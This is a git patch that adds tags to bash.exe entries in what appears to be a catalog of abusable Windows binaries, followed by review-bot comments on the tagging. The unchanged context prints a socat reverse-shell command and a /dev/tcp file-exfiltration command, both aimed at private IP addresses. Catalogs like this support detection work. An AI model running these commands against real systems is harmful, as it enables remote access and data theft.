From 6d4ac1c6806e03e880f64007a59faccdd94feddd Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 12:02:27 +0200 Subject: [PATCH] Update Bash.yml Added tags: - Execute: CMD - Input: Custom format --- yml/OSBinaries/Bash.yml | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index d257f75..87d2963 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD + - Input: Custom Format - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" Description: Executes a reverseshell Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -18,6 +21,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD + - Input: Custom Format - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' Description: Exfiltrate data Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -25,6 +31,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD + - Input: Custom Format - Command: bash.exe -c calc.exe Description: Executes calc.exe from bash.exe Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. @@ -32,6 +41,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\bash.exe - Path: C:\Windows\SysWOW64\bash.exe
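Review bot: The tag value added in the first hunk (@@ -11,6 +11,9 @@) is spelled `Input: Custom Format`, while the commit message lists it as `Input: Custom format`. Use one casing in both places, because a consumer that filters entries by tag may compare values as exact strings (an assumption; the patch does not show how tags are consumed). The `- Command:` line of the entry being tagged is above the visible context, so confirm in the full file that this block lands under the intended command.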
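Review bot: In the third hunk (@@ -25,6 +31,9 @@) `Execute: CMD` is attached to the entry whose Description is "Exfiltrate data" (`cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24`), so anyone who builds detections or filters by tag will see this entry only as an execution technique. Either say in the commit message why an execution tag fits a data-transfer entry, or leave the tag off this entry. The unchanged Usecase line for this entry still reads "Performs execution of specified file", which has the same mismatch and could be corrected in the same change.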
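Review bot: In the last hunk (@@ -32,6 +41,9 @@) the tagged entry is `bash.exe -c calc.exe`, described as "Executes calc.exe from bash.exe", yet it receives the same `Execute: CMD` and `Input: Custom Format` pair as the socat and /dev/tcp entries. The patch does not document what "Custom Format" refers to for a plain `-c` argument, or why launching an executable is classed as CMD. Add a line to the commit message stating how the two values were chosen, and check each entry against the project's tag definitions rather than applying one pair to all four.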